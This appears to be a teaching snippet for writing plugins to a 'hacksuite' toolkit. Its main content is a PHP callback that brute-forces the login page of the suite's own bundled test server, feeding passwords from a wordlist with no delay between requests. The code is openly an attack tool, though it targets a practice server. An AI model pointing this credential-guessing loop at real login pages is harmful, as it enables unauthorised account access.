..we are going to create a new app for the hacksuite. We're not going to do anything fancy here; we will write a simple app to get familiar with how to write compatible scripts for the..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/*
Bruteforce the TestServer
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
// Only run when pulled in by the suite itself (IN_SCRIPT is presumably set by the
// hacksuite loader); a direct HTTP request to this file gets nothing.
defined('IN_SCRIPT') or exit;
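// properties for this callback: the label shown for it and the script that implements it
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes,
// so both are read from the test server's config instead of being hard-coded here.
// The config is read positionally: line 5 (index 4) is expected to hold "...|<user>"
// and line 9 (index 8) "...|<success message>".
// NOTE(review): that layout is only inferred from the offsets used below -- confirm
// against login_single_user.php before relying on it.
$aAttackVars = file($_PATHS['config_root']."/login_single_user.php");
if ($aAttackVars === false) {
    // unreadable config: file() already emitted its warning, carry on with nothing
    $aAttackVars = array();
}
$aAttackVarsU = isset($aAttackVars[4]) ? explode("|", $aAttackVars[4]) : array();
$aAttackVarsS = isset($aAttackVars[8]) ? explode("|", $aAttackVars[8]) : array();
$aGlobalConfig = array();
// a missing line or a line without a "|" yields "" -- the same value the unchecked
// indexing produced before, but without the undefined-index notices
$aGlobalConfig['user'] = isset($aAttackVarsU[1]) ? trim($aAttackVarsU[1]) : "";
$aGlobalConfig['success'] = isset($aAttackVarsS[1]) ? trim($aAttackVarsS[1]) : "";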
/* variable properties */
// Each entry describes one form field of the SScan module: 'row' is the row id,
// 'fieldclass' the field's css class, 'value' what gets filled in and 'visibility'
// whether the row is hidden (0), shown (1) or left untouched (2).
$_CBACKV = array(
    // target: the test server's login page, derived from the thc_ss server root
    0 => array(
        'value' => @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php",
        'row' => "a1",
        'fieldclass' => "a1f",
        'visibility' => 0,
    ),
    // presumably the delay between requests: zero, we want the brute force to be as fast as possible
    1 => array(
        'value' => "0",
        'row' => "a2",
        'fieldclass' => "a2f",
        'visibility' => 0,
    ),
    // success marker, taken from the test server's config above
    2 => array(
        'value' => $aGlobalConfig['success'],
        'fieldclass' => "a5f",
        'row' => "a4",
        'visibility' => 0,
    ),
    // presumably the request method
    3 => array(
        'value' => "post",
        'row' => "a5",
        'fieldclass' => "a6f",
        'visibility' => 0,
    ),
    4 => array(
        'value' => 1,
        'row' => "a6",
        'fieldclass' => "scanf",
        'visibility' => 2,
    ),
    // an empty value leaves the field as it is
    5 => array(
        'value' => "",
        'row' => "callbackfunction",
        'fieldclass' => "callbackfunctionf",
        'visibility' => 1,
    ),
);
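if(!isset($_GETCBACK)){
    /* Script that brute forces the testserver of the hacksuite
    Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
    NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
    NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
    NOTE 3: don't rewrite this function, instead make a new one with the same name
    PARAMETERS:
    NONE
    RETURNS:
    STRING: query string OR break key word BREAK
    */
    if(!function_exists("Callbck")){
        function Callbck(){
            global $iOffsetKeyword;
            global $aListWord;
            global $aGlobalConfig;
            // past the end of the wordlist: tell the scanner to stop
            if(!isset($aListWord[$iOffsetKeyword])){
                return("BREAK");
            }
            // file() keeps the trailing newline on every line, hence the trim.
            // http_build_query() percent-encodes both values, so a candidate that
            // contains '&', '=', '+', '%' or '#' no longer corrupts the request --
            // the bare concatenation used before silently broke those attempts.
            // NOTE(review): assumes the SScan module appends this verbatim, as the
            // docblock says, and does not url-encode it a second time -- confirm.
            $sString = http_build_query(array(
                "user" => $aGlobalConfig['user'],
                "pass" => trim($aListWord[$iOffsetKeyword]),
            ));
            $iOffsetKeyword++;
            return($sString);
        }
    }
    // load thc wordlist
    if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
        die($sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
    }
    $iOffsetKeyword = 0;
    // dissect the target; parse_url() returns false for a seriously malformed url,
    // normalise that to an empty array so the index assignment below stays valid
    $aUrl = @parse_url($_CBACKV[0]['value']);
    if($aUrl===false){
        $aUrl = array();
    }
    // set loops variable
    $iLoops = count($aListWord);
    // make a copy of the old query (this used to read the not-yet-set 'queryold'
    // key instead of 'query', so the copy was always empty)
    $aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" ? $aUrl['query'] : "");
}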
?>